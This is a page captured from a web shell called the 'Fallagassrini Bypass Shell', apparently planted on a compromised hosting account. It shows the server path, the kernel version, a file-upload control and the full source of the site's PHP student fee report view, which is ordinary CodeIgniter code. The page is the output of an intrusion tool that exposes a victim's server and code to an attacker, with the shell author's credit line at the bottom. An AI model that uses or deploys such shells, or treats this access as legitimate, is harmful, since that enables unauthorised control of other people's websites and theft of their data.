? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/sec/draft/application/views/report/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/sec/draft/application/views/report/xls_fee_report.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
$html = '';
if ($view != 'view') {
    $border = "";
$html.= '<html><head><body>';
$html.='<table width="100%" class="sort">
        <tr><td colspan="2"></td><td align="right"><img src="' . base_url() . 'assets/img/logo.jpg" style="float:right;width:200px;"/></td>
        <tr><td colspan="3" style="font-size:16px;" align="center"><b><u>' . $postdata['report_name'] . '</u></b></td></tr>
          
        <tr><td colspan="3">Printout Date : ' . date('d-m-Y') . ', ' . date('h:i:s a') . '</td></tr>
        </table><br><br>';
$html.='<hr>';
}else { $html.="
    <div style='width: 100%;border:1px solid #e4e4e4;padding:2px;
height: auto;
overflow-x: scroll;'>
";
}
if($view!='xls'){
    $border = "border='1'";
}
$html.='<table  cellspacing="0px" class="sort" cellpading="5px"  '.$border.' style="width:100%;text-align:left" >
        <thead>
        <tr><th style="text-align:left" bgcolor="#7FCEFF">Sl No</th>';
$i = 1;
$column=array();
while ($i <= $postdata['field_count']) {
    if (isset($postdata['field_name_' . $i])) {
        $column_name = explode('~', $postdata['field_name_' . $i]);
        $html .= '<th style="text-align:left" bgcolor="#7FCEFF">' . str_replace('_', ' ', $column_name[1]) . '</th>';
       $column[]=$column_name[1];
    }
    $i++;
}

$html.='</tr>
        </thead>
        <tbody>';
        $sl=1;$i=1;$j=1;
        $rowspan="";    
        
        $stude_course_fee=array();
        $temp=1;
        $total_fee='';
        if(!empty($report)){
        foreach ($report as $cs_key=>$fee_info){
            $rowspan="";
            if($fee_info['fee_id']!=0){
            if($fee_info['fee_id']!=0 && $row_span[$fee_info['fee_id']]>1)
                $rowspan = "rowspan='" . $row_span[$fee_info['fee_id']] . "'";
                $reg_fee=$fee_info['registration_fee'];
                $reg_fee_paid=$this->studentmodel->get_student_reg_fee_pending($fee_info['student_id'], $fee_info['course_id']);
                
                $book_fee=$fee_info['student_books_fee'];
                $book_fee_paid=$this->studentmodel->get_student_books_fee_pending($fee_info['student_id'], $fee_info['course_id']);

                $course_fee=$fee_info['student_course_fee']; 

                $course_fee_paid=$this->studentmodel->get_student_fee_pending($fee_info['student_id'],$fee_info['course_id']); 

                $extra_class_fee=$this->studentmodel->get_student_extra_class_fee($fee_info['student_id'],$fee_info['batch_id']); 
                $extra_class_fee_paid=$this->studentmodel->get_student_extra_class_fee_pending($fee_info['student_id'], $fee_info['course_id']);
                
                $html.='<tr>';
                if($temp==1){
                    $html.='<td ' . $rowspan . '>'.$sl++.'</td>';
                    if (array_key_exists('field_name_1', $postdata))
                        $html.='<td ' . $rowspan . '>' . $fee_info['reg_no'] . '</td>';
                    if (array_key_exists('field_name_2', $postdata))
                        $html.='<td ' . $rowspan . '>' . $fee_info['first_name'] . '</td>';

                    if (array_key_exists('field_name_3', $postdata))
                        $html.='<td ' . $rowspan . '>' . $fee_info['last_name'] . '</td>';

                    if (array_key_exists('field_name_4', $postdata))
                        $html.='<td ' . $rowspan . '>' . $fee_info['gender'] . '</td> ';

                    if (array_key_exists('field_name_5', $postdata))
                        $html.='<td ' . $rowspan . '>' . $fee_info['nationality'] . '</td> ';
                    
                    
                    if (array_key_exists('field_name_6', $postdata))
                        $html.='<td ' . $rowspan . '>' . $fee_info['batch_no'] . '</td> ';
                    if (array_key_exists('field_name_7', $postdata))
                        $html.='<td ' . $rowspan . '>' . $this->mastermodel->convertdatenormalformat($fee_info['date']). '</td> ';


                    if (array_key_exists('field_name_8', $postdata)){            
                        $html.='<td ' . $rowspan . '>' . $reg_fee . '</td>';
                    }
                    if (array_key_exists('field_name_9', $postdata)){

                        $html.='<td ' . $rowspan . '>' .($reg_fee-$reg_fee_paid->reg_paid_amount) . '</td>';
                    }

                    if (array_key_exists('field_name_10', $postdata))
                        $html.='<td ' . $rowspan . '>' . $course_fee. '</td>';

                    if (array_key_exists('field_name_11', $postdata))
                        $html.='<td ' . $rowspan . '>' .($course_fee- $course_fee_paid->paid_amount). '</td>';

                    if (array_key_exists('field_name_12', $postdata)){

                        $html.='<td ' . $rowspan . '>' . $extra_class_fee->extraclass_fee. '</td>';
                    }
                    if (array_key_exists('field_name_13', $postdata)){

                        $html.='<td ' . $rowspan . '>' . ($extra_class_fee->extraclass_fee-$extra_class_fee_paid->extra_class_fee_paid). '</td>';
                    }
                     if (array_key_exists('field_name_14', $postdata)){

                        $html.='<td ' . $rowspan . '>' . $book_fee. '</td>';
                    }
                    if (array_key_exists('field_name_15', $postdata)){

                        $html.='<td ' . $rowspan . '>' . ($book_fee-$book_fee_paid->books_paid_amount). '</td>';
                    }

                    if (array_key_exists('field_name_16', $postdata))
                        $html.='<td ' . $rowspan . '>' . $this->mastermodel->convertdatenormalformat($fee_info['fee_date']) . '</td>';  
                }
                if (array_key_exists('field_name_17', $postdata)){
                    $type="";
                    $cost=0;
                    $balance=0;
                    $stude_course_fee[$fee_info['student_id']][$fee_info['course_id']][$fee_info['fee_type']][]=$fee_info['amount_paid'];                    
                    if($fee_info['fee_type']=='course'){
                        $type="Course Fee";
                        $balance=$course_fee-array_sum($stude_course_fee[$fee_info['student_id']][$fee_info['course_id']][$fee_info['fee_type']]);
                        
                    }
                    else if($fee_info['fee_type']=='registration'){
                        $type="Registration Fee";
                        $balance=$reg_fee-array_sum($stude_course_fee[$fee_info['student_id']][$fee_info['course_id']][$fee_info['fee_type']]);
                    }
                    else if($fee_info['fee_type']=='extraclass'){
                        $type="Extra Class Fee";
                        $balance=$extra_class_fee->extraclass_fee-array_sum($stude_course_fee[$fee_info['student_id']][$fee_info['course_id']][$fee_info['fee_type']]);
                    }
                    else if($fee_info['fee_type']=='books'){
                        $type="Books Fee";
                        $balance=$book_fee-array_sum($stude_course_fee[$fee_info['student_id']][$fee_info['course_id']][$fee_info['fee_type']]);
                    }
                    $html.='<td>' . $type . '</td>';
                }

                if (array_key_exists('field_name_18', $postdata))
                    $html.='<td >' . $fee_info['amount_paid'] . '</td>';

                if (array_key_exists('field_name_19', $postdata))
                    $html.='<td >' . $balance . '</td>';

                if($temp==1){
                    if (array_key_exists('field_name_20', $postdata))
                        $html.='<td ' . $rowspan . '>' . $fee_info['total_amount'] . '</td>';

                    if (array_key_exists('field_name_21', $postdata))
                        $html.='<td ' . $rowspan . '>' . $fee_info['remarks'] . '</td>';
                    $total_fee+=$fee_info['total_amount'];
                    
            }
            
            
            if($temp==$row_span[$fee_info['fee_id']] || $fee_info['fee_id']==0)
                $temp=1;
            else
                $temp++;
            
                $html.='</tr>';

        }
    }
        }
$colspan=count($column)-1;
 if (array_key_exists('field_name_18', $postdata))
 {
   $html.='<tr>
       <td colspan='.$colspan.' style=text-align:right >Total Amount</td>
       <td >'.$total_fee.'</td>
       </tr>';
 }
    $html.='</tbody></table>';
    $html.='<hr>';

if ($view == 'view') {
    $html.="</div>";
    echo $html;
} else {
$html.='</body></html>';
$filename = $postdata['report_name'];if ($view == 'xls') {
        header("Content-type: application/octet-stream");
        header("Content-Disposition: attachment; filename=" . $filename . ".xls");
        header("Pragma: no-cache");
        header("Expires: 0");
    }
    if ($view == 'pdf') {
        pdf_create($html, 'Fee','true');
    }
    print $html;
    exit;
}
?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net